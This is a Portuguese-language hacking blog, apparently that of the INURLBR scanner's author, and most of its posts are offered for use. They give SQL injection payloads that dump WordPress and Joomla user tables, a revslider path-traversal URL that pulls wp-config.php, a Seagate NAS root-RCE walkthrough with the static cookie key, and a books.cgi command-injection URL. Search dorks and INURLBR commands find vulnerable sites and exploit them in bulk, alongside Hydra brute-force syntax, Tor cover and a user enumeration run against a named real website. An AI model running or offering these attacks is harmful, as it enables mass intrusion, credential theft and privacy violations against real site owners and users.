Parceiro: Camisetas Hacker

Camisetas para Nerds & Hackers

Mostrando postagens com marcador tutorial. Mostrar todas as postagens
Mostrando postagens com marcador tutorial. Mostrar todas as postagens

quinta-feira, 7 de maio de 2015

WordPress FBConnect SQL Injection Vulnerability + INURLBR VALIDATING HTML RETURN

[ + ] INURLBR 2.1
[ + ] EXPLORING:   SQLI AND VALIDATING HTML RETURN
[ + ] WORDPRESS:  Fbconnect
[ + ] FILE VULN:     fbconnect_action=myhome&fbuserid=1
[ + ] EXPLOIT:        and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0
exec: fbconnect_action=myhome&fbuserid=1 + xpl

[ + ] INURLBR 2.1 [ + ] EXPLORING:   SQLI AND VALIDATING HTML RETURN [ + ] WORDPRESS:  Fbconnect [ + ] FILE VULN:     fbconnect_action=myhome&fbuserid=1 [ + ] EXPLOIT:        and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0 exec: fbconnect_action=myhome&fbuserid=1 + xpl


  # AUTOR:         Cleiton Pinheiro / Nick: googleINURL
  # Email:         [email protected]
  # Blog:          http://blog.inurl.com.br
  # Twitter:       https://twitter.com/googleinurl
  # Fanpage:       https://fb.com/InurlBrasil
  # Pastebin       http://pastebin.com/u/Googleinurl
  # GIT:           https://github.com/googleinurl
  # PSS:           http://packetstormsecurity.com/user/googleinurl
  # EA:            http://www.exploit4arab.net/author/248/Cleiton_Pinheiro
  # YOUTUBE:       http://youtube.com/c/INURLBrasil
  # PLUS:          http://google.com/+INURLBrasil

[ + ] SEARCH DORK
--dork 'inurl:"?fbconnect_action="' 
---------------------------------------------------------------------------

[ + OUTPUT VULN
-s sqli.txt  
---------------------------------------------------------------------------

[ + ID SEARCH ENGINES 1 = GOOGLE + CSE, 6 GOOGLE API
-q 1,6 
---------------------------------------------------------------------------

[ + EXPLOIT GET
--exploit-get '/?fbconnect_action=myhome&fbuserid=1 and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0'
---------------------------------------------------------------------------

[ + TYPE INTERNAL VALIDATION
-t 2 
---------------------------------------------------------------------------

[ + SEARCH FOR CUSTOM VALUE
-a 'xpl_success' 
---------------------------------------------------------------------------

[ + FILTER HOSTS URL / MOD UNIQUE = HOST+XPL_GET
--unique
---------------------------------------------------------------------------

[ + ] CONVERTED VALUE
0x78706c5f73756363657373 = hex(xpl_success)
---------------------------------------------------------------------------

- We pass the value (hexdecimal)-'0x78706c5f73756363657373' in our sql injection.

Se a string 'xpl_success' aparecer no retorno html do nosso alvo, Significa que foi explorado com sucesso.
If the string 'xpl_success' appears on the html return of our target, it means that was successfully exploited.


Resumindo eu passo um valor pré-definido na minha injeção sql em formato hexdecimal no select ,caso tal valor retorne no formato string significa que foi executado com sucesso.
No tutorial converti a string xpl_success para hexadecimal que fica 78706c5f73756363657373, injeto no server ele executa e prita pro cliente.
No script INURLBR o parâmetro -t level 2 é pra ser validado com uma busca personalizada dentro do alvo, quando quero achar uma determinada string por isso usamos o comando -a complementando, -t 2 anula a busca de outros erros SQLI  e vai focar somente em nossa string passada através -a 'sua_string'.



if(HTML == xpl_success){ OK }


[ + ] COMMAND:
php inurlbrpriv8.php  --dork 'inurl:"?fbconnect_action="' -s sqli.txt -q 1,6 --exploit-get '/?fbconnect_action=myhome&fbuserid=1 and 1=2 union select 1,2,3,4,5,group_concat(0x78706c5f73756363657373),7,8,9,10,11,12 from wp_users where id > 0' -t 2 -a 'xpl_success' --unique

[ + ] VÍDEO:


DOWNLOAD SCANNER: 
https://github.com/googleinurl/SCANNER-INURLBR


REF
http://blog.inurl.com.br/2013/09/exploit-wordpress-fbconnectaction-pei.html
http://www.1337day.com/exploit/15790

terça-feira, 17 de março de 2015

MINI EXPLOIT: Joomla Simple Photo Gallery - SQL injection + VIDEO

Usando miniexploit para explorar em massa vários alvos.

Usando miniexploit para explorar em massa vários alvos. Title: Joomla Simple Photo Gallery - SQL injection Date : 13-03-2015 Vendor Homepage: https://www.apptha.com/ Source Plugin: https://www.apptha.com/category/extension/joomla/simple-photo-gallery Version : 1 Tested on : sqlmap

Title: Joomla Simple Photo Gallery - SQL injection
Date : 13-03-2015
Vendor Homepage: https://www.apptha.com/
Source Plugin: https://www.apptha.com/category/extension/joomla/simple-photo-gallery
Version : 1
Tested on : sqlmap

POC:
http://{$target}/index.php?option=com_simplephotogallery&view=images&albumid=[SQLI]

Comando SQLMAP de exploração:
sqlmap  -u '{$target}/index.php?option=com_simplephotogallery&view=images&albumid=1' -p albumid --batch --dbms=MySQL --proxy 'http://localhost:8118' --random-agent --level 2 --risk 1 --eta --answers='follow=N' --dbs --is-dba

DORK de pesquisa:
Dork Google 1: inurl:/com_simplephotogallery site:com
Dork Google 2: inurl:/com_simplephotogallery site:org
Dork Google 3: inurl:/com_simplephotogallery site:fr
Dork Google 4: inurl:/com_simplephotogallery/


Agora vamos organizar nosso comando INURLBR  para executar nosso miniexploit.php
Primeiro vamos organizar o parâmetro --dork que captura seu filtro de busca.

 --dork Defines which dork the search engine will use.
     Example: --dork {dork}
     Usage:   --dork 'site:.gov.br inurl:php? id'
     - Using multiples dorks:
     Example: --dork {[DORK]dork1[DORK]dork2[DORK]dork3}
     Usage:   --dork '[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'
Parâmetro organizado:
--dork '[DORK]inurl:/com_simplephotogallery site:com[DORK]inurl:/com_simplephotogal lery site:org[DORK]inurl:/com_simplephotogallery site:fr[DORK]inurl:/com_simplephotogallery/'

Baixar MINI exploit-SQLMAP / Joomla Simple Photo Gallery 1.0 - SQL injection: 
http://pastebin.com/Gb5uhPKW
File: miniexploit.php

Baixar scanner INURLBR 1.0:
https://github.com/googleinurl/SCANNER-INURLBR
File: inurlbr.php


Executando:
./inurlbr.php --dork '[DORK]inurl:/com_simplephotogallery site:com[DORK]inurl:/com_simplephotogal lery site:org[DORK]inurl:/com_simplephotogallery site:fr[DORK]inurl:/com_simplephotogallery/' -s save.txt -q 1,6 --command-all "php miniexploit2.php '_TARGET_'"

segunda-feira, 2 de março de 2015

Seagate Business NAS / Pre-Authentication Remote Code Execution (0day)

Seagate é um fornecedor bem conhecido em soluções de hardware, com produtos disponíveis em todo o mundo. Sua linha de produtos NAS dirigidas às empresas é chamado de Business Storage 2-Bay NAS. Estes podem ser encontrados dentro de redes domésticas e empresariais e, em muitos casos, eles são expostos publicamente.
Seagate é um fornecedor bem conhecido em soluções de hardware, com produtos disponíveis em todo o mundo. Sua linha de produtos NAS dirigidas às empresas é chamado de Business Storage 2-Bay NAS. Estes podem ser encontrados dentro de redes domésticas e empresariais e, em muitos casos, eles são expostos publicamente.


Os produtos que executam versões de firmware até a versão 2014,00319 foram encontrados vulnerabilidades que permitem a execução remota de código como usuário root.
Essas vulnerabilidades são exploráveis sem necessidade de qualquer forma de autorização no dispositivo.

Detalhes da Vulnerabilidade

Produtos Business Storage 2-Bay NAS vem com um aplicativo de gerenciamento de web habilitado. Este aplicativo permite que os administradores executem funções de configuração de dispositivos usuais, como a adição de usuários, a criação de controle de acesso, gerenciamento de arquivos etc...

A aplicação web é construído com as seguintes tecnologias de base:

  1. PHP versão 5.2.13 (Lançado 25 de fevereiro de 2010)
  2. CodeIgniter 2.1.0 (23 Lançado em novembro de 2011)
  3. Lighttpd 1.4.28 (Lançado 22 de agosto de 2010)

Todas essas três tecnologias são claramente desatualizadas, e as versões listadas do PHP e CodeIgniter são conhecidos por terem problemas de segurança. Em cima dessas tecnologias seta uma aplicação PHP personalizado, que contém em si uma série de brechas relacionadas à segurança é digamos bem problemático.

Detalhes sobre as tecnologias setadas acima o porque estão defasadas, tais versões.

PHP 5.2.3

As versões do PHP anteriores à 5.3.4 permitir aos usuários especificar caminhos de arquivo que incluem um byte NULL (CVE-2006-7243). Essa brecha permite que os dados controlados pelo usuário para encerrar prematuramente caminhos de arquivo, permitindo controle total sobre a extensão do arquivo.
Demonstrado por .php\0.jpg no final do argumento para a função file_exists.

CodeIgniter 2.1.0

Versões do CodeIgniter  2.2.0 criam tokens de sessão que são constituídos de um array associativo PHP serializado (hash), que foi criptografada usando um algoritmo personalizado.
Este hash de PHP contém dados controladas pelo utilizador, o que torna possível para os usuários uma extração de chave pa (criptografar e descriptografar) o conteúdo do cookie (CVE-2014-8686). Uma vez decifrados, os usuários podem modificar o conteúdo do cookie e re-encrypt antes de enviá-lo de volta para o servidor, resultando em outros vetores de ataque potenciais, incluindo PHP object injection.

Exploitation / Bypass

É simples de explorar os problemas listados acima para obter a execução de código arbitrário no dispositivo como o usuário root. Os principais passos necessários para alcançar este objectivo são:

O atacante deve escrever código PHP para o sistema de arquivos no NAS.
Isso pode ser feito de várias maneiras, incluindo:

  1. HTTP access envenenamento arquivo de log por meio do cabeçalho User-Agent.
  2. HTTP error envenenamento arquivo de registro através do cabeçalho do host.
  3. Modificando a descrição do dispositivo na interface do aplicativo web. Este escreve cadeias controladas pelo usuário para um arquivo localizado em /etc/DeviceDesc, no entanto, requer direitos administrativos.
  4. Upload de arquivos para um compartilhamento de arquivo que o dispositivo tenha exposto. 
  • O atacante deve, então, manipular o conteúdo da variável de idioma no cookie de sessão para que ele contém o caminho para o PHP controlado pelo invasor no sistema de arquivos.
  • A falha byte NULL em PHP deve ser utilizado no fim de este valor para forçar o PHP ignorar quaisquer caracteres que são acrescentados ao caminho do arquivo pelo aplicativo web.
  • O invasor, então, faz um pedido com os cookies manipulados, resultando na execução de código como root.

O Script-Exploit

 Beyond Binary(https://beyondbinary.io/) produziu um módulo Metasploit e um script Python standalone que automatizar o processo de exploração. Cada um desses scripts ter a seguinte abordagem:

  1. Conecta-se a meta de NAS e extrai um cookie ci_session.
  2. Decifrar o cookie usando a chave de criptografia estática de 0f0a000d02011f0248000d290d0b0b0e03010e07 e extrair o hash PHP.
  3. Modifica o hash PHP serializado para que o nome de usuário é definido como administrador e o campo is_admin está definido para yes.
  4. Criptografe essa hash atualizando o PHP pronto para uso posterior como um cookie ci_session. Este cookie permite agora que os futuros pedidos para operar no NAS como se fossem um administrador("DILIÇÇA CARA").
  5. Executar um pedido para extrair a configuração do host, que inclui a descrição do dispositivo.
  6. Modificar a configuração de host para que a descrição do dispositivo contenha uma pequena stager payload.
  7. Executar uma solicitação para atualizar a configuração do host com os novos dados, de modo que a stager payload é gravado em /etc/DeviceDesc.
  8. Modificar o hash PHP novamente para que o parâmetro de idioma contenha o  ../../../../etc/devicedesc\x00 como valor (note o byte NULL no final).
  9. Criptografar a nova hash PHP pronto para uso futuro como um cookie ci_session.
  10. Executar um pedido para NAS usando o cookie criado na etapa anterior. Isso chama a stager que foi escrito para o disco. Pedindo um mensagens como uma carga maior, que é gravado em disco na raiz do servidor web.
  11. Executa um outro pedido que, em seguida, redefine a configuração de host de volta ao que era antes da exploração.
Shodan(https://www.shodan.io/) relata que há mais de 2.500 dispositivos expostos publicamente na Internet que são possíveis vulneráveis.

Explots disponíveis para download aqui:

Beyond Binary(https://beyondbinary.io/) produziu um módulo Metasploit e um script Python standalone que automatizar o processo de exploração. Cada um desses scripts ter a seguinte abordagem:  Conecta-se a meta de NAS e extrai um cookie ci_session. Decifrar o cookie usando a chave de criptografia estática de 0f0a000d02011f0248000d290d0b0b0e03010e07 e extrair o hash PHP. Modifica o hash PHP serializado para que o nome de usuário é definido como administrador e o campo is_admin está definido para yes. Criptografe essa hash atualizando o PHP pronto para uso posterior como um cookie ci_session. Este cookie permite agora que os futuros pedidos para operar no NAS como se fossem um administrador("DILIÇÇA CARA"). Executar um pedido para extrair a configuração do host, que inclui a descrição do dispositivo. Modificar a configuração de host para que a descrição do dispositivo contenha uma pequena stager payload. Executar uma solicitação para atualizar a configuração do host com os novos dados, de modo que a stager payload é gravado em /etc/DeviceDesc. Modificar o hash PHP novamente para que o parâmetro de idioma contenha o  ../../../../etc/devicedesc\x00 como valor (note o byte NULL no final). Criptografar a nova hash PHP pronto para uso futuro como um cookie ci_session. Executar um pedido para NAS usando o cookie criado na etapa anterior. Isso chama a stager que foi escrito para o disco. Pedindo um mensagens como uma carga maior, que é gravado em disco na raiz do servidor web. Executa um outro pedido que, em seguida, redefine a configuração de host de volta ao que era antes da exploração.

----------------------------------------------------------------------------------------------------
https://beyondbinary.io/exploits/bbsec001/seagate_nas_php_exec_noauth.rb
OU
https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/seagate_nas_php_exec_noauth.rb
----------------------------------------------------------------------------------------------------
https://beyondbinary.io/exploits/bbsec001/seagate_nas_php_exec_noauth.py
OU
http://www.exploit-db.com/exploits/36202/
----------------------------------------------------------------------------------------------------

Seagate Business NAS <= 2014.00319 - Pre-Authentication Remote Code Execution (0day)

Some Seagate Business NAS devices are vulnerable to command execution via a local file include vulnerability hidden in the language parameter of the CodeIgniter session cookie. The vulnerability manifests in the way the language files are included in the code on the login page, and hence is open to attack from users without the need for authentication. The cookie can be easily decrypted using a known static encryption key and re-encrypted once the PHP object string has been modified. This module has been tested on the STBN300 device.

CVE-2014-8684 , CVE-2014-8686 , CVE-2014-8687

 Usage
 =====
 seagape.py <ip> <port> [-c [ua]]

 - ip   : ip or host name of the target NAS
 - port : port of the admin web ui
 - -c   : (optional) create a cookie which will give admin access.
          Not specifying this flag results in webshell installation.
 - ua   : (optional) the user agent used by the browser for the
          admin session (UA must match the target browser).
          Default value is listed below

 Example
 =======
 Install and interact with the web shell:
 seagape.py 192.168.0.1 80

 Create admin cookie
 seagape.py 192.168.0.1 80 -c
http://1337day.com/exploit/23338
----------------------------------------------------------------------------------------------------

REF:
http://www.rapid7.com/db/vulnerabilities/php-cve-2006-7243
https://beyondbinary.io/advisory/seagate-nas-rce/

segunda-feira, 19 de janeiro de 2015

0days Theme Arbitrary File Download Vulnerability + SCANNER INURLBR / EXPLOIT INURL A.F.D Verification

0days Theme  Arbitrary File Download Vulnerability + SCANNER INURLBR / EXPLOIT INURL A.F.D Verification


-------------------------------------------------------------------------------------------

Wordpress Theme U-Design Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/u-design/"
ACCESS: http://1337day.com/exploit/23143

-------------------------------------------------------------------------------------------

Wordpress Theme Terra Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/terra/"
ACCESS: http://1337day.com/exploit/23142
-------------------------------------------------------------------------------------------

Wordpress Theme Pindol Arbitrary File Download Vulnerability
DORK: inurl:"wp-content/themes/pindol/"
ACCESS: http://1337day.com/exploit/23144
-------------------------------------------------------------------------------------------

All themes above, are failing in the same revslider plugin.
POC:
http://[target]/[path]/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

[EXPLOIT]: Wordpress A.F.D Verification/ INURL - BRASIL

Exploit developed can check about 20 themes, and allows check standard as follows.POC -> /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
Which is the same as 0day mentioned above.

[Exploit ACCESS]
http://pastebin.com/ZEnbxXXd
http://packetstormsecurity.com/files/129706/WordPress-Themes-download.php-File-Disclosure.html
Please download the exploit and put the name of exploit.php

Now let's use the inurlbr scanner as a mass explorer
[SCANNER INURLBR]
https://github.com/googleinurl/SCANNER-INURLBR

Command use INURLBR:
Ex: php inurlbr.php --dork 'you dork' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/u-design/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/terra/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

php inurlbr.php --dork 'inurl:"wp-content/themes/pindol/"' -q 1,6 -s save.txt --comand-all 'php exploit.php _TARGET_'

Brief introduction --comand
--comand-vul Every vulnerable URL found will execute this command parameters.
     Example: --comand-vul {command}
     Usage:   --comand-vul 'nmap sV -p 22,80,21 _TARGET_'
              --comand-vul './exploit.sh _TARGET_ output.txt'
 --comand-all Use this commmand to specify a single command to EVERY URL found.
     Example: --comand-all {command}
     Usage:   --comand-all 'nmap sV -p 22,80,21 _TARGET_'
              --comand-all './exploit.sh _TARGET_ output.txt'
    Observation:
    _TARGET_ will be replaced by the URL/target found, although if the user
    doesn't input the get, only the domain will be executed.
   _TARGETFULL_ will be replaced by the original URL / target found.

-------------------------------------------------------------------------------------------

INURLBR ADVANCED CONTROL

php inurlbr.php --dork 'YOU DORK revslider' -q 1,6 -s wordpress2.txt --exploit-get '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' -t 3 --exploit-comand '/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php' --comand-all 'echo "_TARGET__EXPLOIT_">> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_" >> curlwordpress.txt;curl "_TARGET__EXPLOIT_"|grep "DB_"'



[TUTORIAL] - Wordpress A.F.D Verification/ INURL - BRASIL + SCANNER INURLBR



[TUTORIAL] - Hacking Painel Wordpress - Slider Revolution


[TUTORIAL] - Getting access to the Wordpress panel


REF:
http://pastebin.com/cGpxRQCs
http://blog.inurl.com.br/2015/01/arbitrary-file-download-vulnerability.html
http://blog.inurl.com.br/2015/01/wordpress-themes-downloadphp-file.html
http://blog.inurl.com.br/2014/08/wordpress-plugin-kenburner-slider-lfd.html
https://github.com/googleinurl/SCANNER-INURLBR#---definindo-comando-externo

domingo, 28 de dezembro de 2014

TUTORIAL Capturing data facebook

TUTORIAL Capturing data facebook

Uma forma simples de pegar dados de usuários facebook
O perfil do alvo deve está parcialmente aberto ou você deve ser amigo do mesmo.
Nem todo perfil temo exito na extração.
--------------------------------------------------------------------------------------------
[TODA INFORMAÇÃO DEVE SER LIVRE]
[جميع المعلومات يجب أن تكون خالية]
[ALL INFORMATION MUST BE FREE]
/*
*/
--------------------------------------------------------------------------------------------

[PROFILE PHOTO]::
https://graph.facebook.com/{USER_OR_ID_USER}/picture?width=2000&height=2000
EX: https://graph.facebook.com/zuck/picture?width=2000&height=2000

[BASIC DATA]::
https://graph.facebook.com/{USER_OR_ID_USER}
 EX: https://graph.facebook.com/zuck
--------------------------------------------------------------------------------------------

[S C R I P T] = > INURL BRASIL / API Facebook Data Mining Utility :: http://packetstormsecurity.com/files/129918/Facebook-Data-Mining-Utility.html

 Description: The script captures uid, username, name, first_name, middle_name, last_name, fri, locale, pic_small_with_logo, pic_big_with_logo, pic_square_with_logo, pic_with_logo

 How to use php face.php {USER_OR_ID_USER}
 http://s21.postimg.org/re018qbvp/Untitled_4.jpg

REF:: http://pastebin.com/PMWXLmyp
--------------------------------------------------------------------------------------------

segunda-feira, 15 de setembro de 2014

VÍDEO TUTORIAL Scanner INURLBR + NMAP + SQLMAP


VÍDEO TUTORIAL Scanner INURLBR + NMAP + SQLMAP

INURLBR Utilizando frameworks de comandos externos


Este tutorial mostra a utilização do SCANNER inurlbr.php
em conjunto com frameworks-scripts de comandos externos ...
usando a flag [--comand-vul] e uma dork para encontrar sql relacionado
vuls ou coleta de informações utilizando framework nmap ...

Este tutorial irá focar em mostrar como o nmap e SqlMap
pode ser usado em conjunto com o SCANNER  inurlbr.php ...
Para mais informações sobre inurlbr sintaxe e como usar o SCANNER
[PHP inurlbr.php --help]

ASSISTA:



Scanner-INURLBR repository: https://github.com/googleinurl/SCANNER-INURLBR

segunda-feira, 4 de agosto de 2014

Wordpress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download

Wordpress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download


0x Wordpress Slider Revolution Responsive <= 4.1.4 Arbitrary File Download


Slider Revolution Responsive é um plugin do wordpress muito utilizado hoje em dia por sites que abortam diversos temas variando de sites governamentais ate mesmo sites de lojas uma falha que aos olhos de muitos poderia ser algo banal acabou virando uma grande dor de cabeça.
O bug permite a download do arquivo wp-config entre outros, no wp-config contem

  1. define('DB_NAME', 'lojaphos'); Nome do banco de dados
  2. define('DB_USER', 'lojaphos'); Usuário relativo ao banco que contem o Wordpress
  3. define('DB_PASSWORD', 'silva2805'); Senha do banco
  4. define('DB_HOST', 'mysql.phosloja.com.br'); normalmente estará como localhost
 0x Explorando 

            Dork revslider.php "index of"
            http://site.alvo/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php


Apos obter essas informações conseguimos reseta/inserir um novo usuário e uma nova senha no banco de dados e efetuar o login com sucesso.
Apos obter essas informações conseguimos reseta/inserir um novo usuário e uma nova senha no banco de dados e efetuar o login com sucesso.

 No vídeo abaixo demostra a exploração com o inurlbr
                                                                   

terça-feira, 29 de julho de 2014

Vídeo Aula - Script InurlBr + SQLMAP + DecrypterMD5


Uma simples demonstração de funcionamento do SCANNER INURLBR junto com SQLMAP e DECRYPTERMD5.


 Comandos utilizado:

php inurlbr.php --dork 'inurl:especialidades.php?id= site:gob.pe' --exploit-get '%27' -q 6 -s inurl_result.txt -p socks5://googleinurl@localhost:9050 --tor-random

Opções:

--dork = Define a dork que sera utilizada nos motores de busca
--exploit-get = Define o exploit via get, que será injetado em cada URL encontrada
-q = Define o motor de busca (ex.: google, bing, yahoo e etc...)
-s = Define o arquivo de saída, onde será armazenada as URLS encontradas
-p = Define o proxy para manter o anomimato
--tor-random = Habilita a função do tor randomico, a cada execução do script, o TOR muda de IP

Maiores detalhes:
https://github.com/googleinurl/SCANNER-INURLBR

Comando SQLMAP:
sqlmap --tor --tor-type=SOCKS5 -u http://sitevull.gob.pe/ --current-db --time-sec 10

Para utilizar o parametro "--tor" é necessário que esteja rodando localmente na porta 9050

Parrot e derivados: # service tor start

Verificar se está rodando: # netstat -an | grep 9050

tcp        0      0 127.0.0.1:9050          0.0.0.0:*               LISTEN


Comando utilizado DECRYPTERMD5:

php md5.php --md5 HASH --proxy socks5://googleinurl@localhost:9050

Opções:

--md5 = Informando o tipo do HASH
--proxy = Ativando o proxy para anomimato

Para maiores informações utilize: # php md5.php --help

É isso ai ;-)

quinta-feira, 24 de julho de 2014

Introdução SCANNER INURLBR V1.0

Introdução SCANNER INURLBR V1.0
[+]  Introdução  
*Busca avançada em motores de busca, Possibilita desde analise com exploit GET/POST a validação personalizada interna para cada alvo/url encontrada.
*Captura de emails.
*Execução de comandos direto no console para cada possível vulnerável. *Execução de comandos direto no console para todo alvo encontrado.  *Analise de urls com base em arquivo txt, sem necessidade de usar motor de busca. *Definição de proxy. *Opção proxy TOR randômico.
_____
(_____)
(() ())
\   /
\ /
/=\
[___]
[INURLBR V1.0]
------------------------------------------------------------------------------


Explicando comando -q
Que é responsável por definir qual motor de busca vai efetuar os trabalhos.

-q tem acesso a 12 motores de busca.
1   - www.google.com.br
2   - www.bing.com
3   - br.search.yahoo.com
4   - www.ask.com
5   - search.hao123.com.br
6   - ajax.googleapis.com
7   - search.lycos.com
8   - busca.uol.com.br
9   - us.yhs4.search.yahoo.com
10  - pesquisa.sapo.pt
11  - www.dmoz.org
12  - www.gigablast.com
all  - todos motores de busca
Default:    1
Exemplo: -q {op}
Uso:
         -q 1 
         -q 5
Múltiplos motores  -q 1,2,5,6,11
Todos motores        -q all
Ex:
-----------------------------------------------------------------------------------------------------------------------------------
./inurlbr.php --dork 'site:br php?id=' -q 1,6 -s arquivo.txt --exploit-get "'´0x27"
-----------------------------------------------------------------------------------------------------------------------------------
0xVÍDEO[1]:

0xVÍDEO[2] - PARROT OS:
0xVÍDEO[2] - Usando Exploit joomla

  
0xDetalhes:

 * joomla component com_tag (tag_id) SQL Injection Vulnerability
 * [Joomla componente]
 * com_tag (tag_id) Vulnerável a SQL-injection

0xCOMANDOS INURLBR:

./inurlbr.php --dork 'inurl:option=com_tag' -q 1,6 -s joomla.txt -t 3 --exploit-get '/index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component' -a 'Edit Tags'


0xDOWNLOAD SCRIPT
https://github.com/googleinurl/SCANNER-INURLBR

Ref:
http://blog.inurl.com.br/2014/07/joomla-component-comtag-tagid-sql.html

quinta-feira, 3 de julho de 2014

joomla component com_tag (tag_id) SQL Injection Vulnerability

[Joomla componente]
[X] com_tag (tag_id) Vulnerável a SQL-injection


0xDORK[0]: inurl:option=com_tag
0xExploit[0]: /index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component 


Exemplo: 


http://WWW.URL.COM/index.php?option=com_tag&controller=tag&task=add&article_id=1

/index.php?option=com_tag&controller=tag&task=add&article_id=-ID{vull}

Injetando:

http://
WWW.URL.COM/index.php?option=com_tag&controller=tag&task=add&article_id=-1/**//*!union*//**//*!select*//**/concat%28username,0x3a,password,0x3a,usertype%29/**//*!from*//**/jos_users/**/&tmpl=component

RESPOSTA:

[X] com_tag (tag_id) Vulnerável a SQL-injection



REF:http://www.exploit-id.com/web-applications/joomla-component-com_tag-tag_id-sql-injection-vulnerability

ALGUNS RESULTADOS:
Usando scanner INURLBR:
Usando scanner INURLBR:
REPOSITÓRIO::: http://pastebin.com/Tb0Qp0qY

segunda-feira, 23 de junho de 2014

[Dumb0] extração de usuários + HYDRA força bruta em formularios web


 [Dumb0] + HYDRA

 Dumb0 é uma ferramenta possibilita extrair usuários ativos de plataformas CMS mais populares.

baixar: git clone https://github.com/0verl0ad/Dumb0.git
projeto: https://github.com/0verl0ad/Dumb0/


CMS que podemos extrair:
            SMF        --         Simple Machine Forums
            IPB          --        Invision Power Board
            XEN        --        Xen Foro
            VB          --        vBulletin
            myBB     --
            useBB    --
            vanilla  --
            bbPress  --
            WP     --        WordPress
            SPIP     --        SPIP CMS
            DRUPAL   --        Drupal
            MOODLE      --        Moodle
            BEE     --        Beehive Forums
            FLUX     --        fluxBB
            FUD     --        FUDforum
            punBB     --
            ACM     --        AcmImBoard XD
            BURN     --        Burning Board
            COM     --        Community Servers
            deluxeBB --       
            fusionBB --
            JFORUM     --
            JITBIT      --        Jibit ASPNetForum
            JIVE     --        Jive Forums
            NEAR     --        Near Forums
            OVBB     --       
            TikiWiki --        TikiWiki CMS-Groupware
Usando:
 Dumb0 é uma ferramenta possibilita extrair usuários ativos de plataformas CMS mais populares.

Comando
Dumb0 ex:
perl dumb0.pl --url=[SEU_ALVO URL] --type=[CMS/FORUM ID] {OPTIONS: --log=[SESSION COOKIE] --file[FILENAME] }


Uma vez identificado o CMS-usuarios podemos direcionar um ataque de força bruta contra eles via hydra.
Usando Hydra:

hydra URL http-form-post "/Path/archivo.php:ParametroUser=^USER^&parametroPass=^PASS^:MSG QUE INDICA FALHA" -L seus_user.txt -P senhas.txt

Sintaxe simples fica assim :
 --------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o out.txt -t 1 -f 127.0.0.1 http-post-form "/login/logar.php:user=^USER^&pass=^PASS^:Usuario ou senha invalida"

--------------------------------------------------------------------------------
 Para criar esta sintaxe foi preciso : Valor do atributo action do
 <form> : logar.php Valor do atributo referente ao nome e senha de usuário nas tags <input> dentro do <form>: name , pass Mensagem de erro ou parte dela: "Usuário ou senha invalida" - O uso do caractere coringa é permitido : .*senha invalida - É possível usar uma mensagem de sucesso adicionando S= antes da mensagem :
 --------------------------------------------------------------------------------
hydra -l admin -P pass.txt -o out.txt -t 1 -f -w 15 127.0.0.1 http-post-form "/login/logar.php:user=^USER^&pass=^PASS^:S=Logado com sucesso"

--------------------------------------------------------------------------------


Exemplo de resultado Dumb0:
alvo:http://www.psdb-mg.org.br/

perl Dumb0.pl --type=WP --url='http://www.psdb-mg.org.br/' --file='ps.txt'

RESULTADO:

[!] Dumping users from http://www.psdb-mg.org.br/...

[+] Posible user found ~> admin &#8211; PSDB - MG
[+] Posible user found ~> psdb &#8211; PSDB - MG
[+] Posible user found ~> psdbjovem &#8211; PSDB - MG
[+] Posible user found ~> psdbmulher &#8211; PSDB - MG
[+] Posible user found ~> psdbsindical &#8211; PSDB - MG
[+] Posible user found ~> itv &#8211; PSDB - MG
[+] Posible user found ~> Alias &#8211; PSDB - MG
[+] Posible user found ~> tucanafro &#8211; PSDB - MG
[!] Work finished


Depois de terminado o scan de users, agora direcionar seu ataque de força bruta com Hydra.

REF:http://blog.0verl0ad.com/2014/02/dumb0pl-herramienta-para-extraer.html
REF:http://www.exploit-db.com/papers/18939/

quinta-feira, 5 de junho de 2014

Executar comandos remotamente via books.cgi Web Terra v. 1.1



Executar comandos remotamente via books.cgi Web Terra v. 1.1

[+] Remote Comand Execution on books.cgi Web Terra v. 1.1
[+] Date: 21/05/2014
[+] CWE number: CWE-78
[+] Risk: High
[+] Author: Felipe Andrian Peixoto
[+] Contact: [email protected]
[+] Tested on: Windows 7 and Linux
[+] Vendor Homepage: http://www2.inforyoma.or.jp/~terra
[+] Vulnerable File: books.cgi
[+] Version : 1.1
[+] Exploit: http://host/patch/books.cgi?file=|COMANDO|

CGI é um acrónimo para a expressão inglesa Common Gateway Interface. Consiste numa importante tecnologia que permite gerar páginas dinâmicas, permitindo a um navegador passar parâmetros para um programa alojado num servidor web. Assim, designam-se por scripts CGI os pequenos programas que interpretam esses parâmetros e geram a página depois de os processar.O CGI foi concebido como o culminar de discussões por especialistas durante os primórdios da Internet, nomeadamente entre Rob McCool, John Franks, Ari Luotonen, George Phillips e Tony Sanders. DEmbora a linguagem tipicamente associada aos CGI seja o Perl, o CGI foi concebido de forma a ser independente da linguagem utilizada. Actualmente tecnologias como ASP.NET, PHP, Python e Ruby continuam a utilizar a especificação.


/DORK's: 
------------------------------------------------------------------------------------------
inurl:*"/books.cgi?file=*"
inurl:"/books.cgi?file="
